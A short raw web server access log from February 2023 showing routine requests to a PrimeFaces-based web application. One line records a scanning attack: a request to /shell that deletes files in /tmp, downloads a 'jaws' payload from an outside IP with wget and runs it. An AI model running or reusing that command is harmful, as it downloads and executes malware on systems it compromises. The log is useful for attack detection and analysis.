186.86.32.196 - - [12/Feb/2023:08:46:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12864
186.86.32.196 - - [12/Feb/2023:08:47:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12841
216.245.221.92 - - [12/Feb/2023:08:48:14 -0500] "HEAD / HTTP/1.1" 200 -
205.185.115.65 - - [12/Feb/2023:08:48:46 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+205.185.121.139/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [12/Feb/2023:08:48:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.244.195.155 - - [12/Feb/2023:08:50:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 58047
201.244.195.155 - - [12/Feb/2023:08:50:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:50:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
